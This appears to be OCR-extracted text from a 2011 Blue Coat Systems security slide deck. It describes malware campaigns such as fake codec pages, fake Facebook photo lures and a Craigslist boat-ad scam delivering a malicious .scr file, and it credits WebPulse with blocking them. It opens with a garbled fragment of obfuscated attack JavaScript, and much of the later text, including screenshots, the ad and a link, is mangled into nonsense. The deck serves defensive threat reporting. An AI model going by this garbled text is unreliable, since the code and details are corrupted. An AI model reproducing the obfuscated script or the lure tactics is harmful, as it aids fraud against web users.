E-0jftBFf++) fttii p.fQ-"*FuY-ftal«a;h3-parseInt < I ^[B+f ]-daFnk .FQojU) *q'« . 2j *pargelnt t(q[f]> 

daHnV r PBnjU) * ij * D , 3 1 ;ij|3-*gF";wK t«-91 ~1 j^a+- ( pt rinat"] IJlSl f JTar 
LV-f unctloa (] [ 3 ; Lliia . flP-'dP" ,- jUB- ' r ;var vC-21692; ]v*r 

«L-f unction £ 1 n ;ps- i- pE l,, ;thig.dH-f *l*a;i - eval Ly+*1"J ;i(gs) ;tliiB.kAT- H kAr ,, ;er- < ' ;vn 
EBV- 1 ' ;Tir i>T-' ' ; ] } ; thi s . kV- m " ?vas tS-f ala« ; daRnk .dpmSKO ;*/*eeipt> 
Litis 1 COI 1 INS NORM 



The Javascript that's 
building those iFrames 
is using a new 
technique (dynamic 
CSS object as local var 
storage)... 

...but WebPulse isn't 
watching the Javascript 
in real-time... 

...it's conducting 
another Background 
Check on the attack 
site, and blocking it, so 
the EXE is never even 
requested. 
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"Snam" Attack Example 




Fake Codec 



Fake Facebook Fotos 
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Fake Facebook Fotos 

■ Link in a message from your "friend" takes you to a 
page that's pretending to be part of Facebook. 



is 
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File Edit View Gd gaakmarks Taa\s Window Help 

\jl "^ £} Q| ['-, hnr ."ri'- : ■ I :i i ?ai.'-r.*uip. J ii<»..- 



IB fj 



. fl K^ms ijBaakmarks '•+ mazilla.ara ^-^n'sZTi ! -x -nozdev.a 



faix-booL 




PUbtb llflS b*Ml ItlAVHl. 






■ ■ ^' Thn pljalc- jtitniLijTi:-.TC.bQob3™3 Imiluu-Ti- TuwlbJi pfc:a cU Vim IVti 






F.miEnk eaiia 


Hcbi* E~udTri>nJ.' BjJjti Attn: AJ-M+iim Dniki: 


Cmir PiiraiT Tuns: RiLp 


O g Bf n ffl Dors 




*Hld 
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Only 3 out of 43 
scanners were 
able to identify 
the EXE as 
malicious that 
day. 

We continue to 
flag fake-foto 
attacks daily, 
even as the 
domains and 
pay loads shift 
continually. 
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Craigslist Malware Attack (4/26/2011 Blog) 



® 1 8ft 98 piwaft 1 SObass bo a..l » 



Columbia craigslist , > jprsate 1 ..wanted > boats 



email I th i 5 po sb n q to a friend 



One of the "fake Facebook foto" guys decided to branch out, and 

do fake-foto attacks via bogus boat ads on Craigslist sites all over 

the country: 

I grabbed a copy 

of the attack file 

(a .scr) the day 

after the attack 

began: only 5AV 

engines 

detected it then. 

Recognition at 
the beginning of 
the attack was 
probably lower. 

(WebPulse 
flagged all of the 
requests.) 
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Avoid snmi snA Ivnud hy Jraliii£ Wally! BcwuTC may fan] involving Western Union, Moiicygrnnv 
unrt imLLsfcj. tat-hitr th«k money ©add, shipping; *Krow> ar my premise of tjanmtiori 
pjflitctiai^eejtilicBiioji/Biiaantte Mart ehj& 

18ft 98 procraft ISObass boat w/ trailer - $2400 



Date: 2011-04-26, 6:3?AMEDT 

Reply to ■ sale -r9gfe- : 346 630BS6ffBcraaaBbt ore 



jElmj wm npjying'to uu 1 



plflBie-flagwithcufl r/ 7 ] 

miGflttepimd 

piqhibLted 

tpmii^oveipogl 

bat at ejfligiljtt 



5 person or 7251b capacity, dual console, dual live wells, this boat runs well, this boat comes completely equipped 
with all desirable options but as with any used boat, no rips, tears, or stains, minor wear may appearand much 
more.the eaaenor k also m excellent condition, 1 35 hp v6 mercury optimal outboard motor, stainless steel prop, 

matching procraft trader with breakaway tongue-,, this boat is ready to go nshingl 1-dEpth finder, the interior of this boat 
ts fake new, matching set of tires on trailer wilh about 50Va tread r«n,2urang> and is- m great con*fction h 



more pictures tan yon see here jhjtj> //comt Jmiime cojin 7^3.[? =sdkifi3v39iS7iJ(vo vi 



D Blue Coat Systems, Inc. 201 1 . All Rights Reserved. 



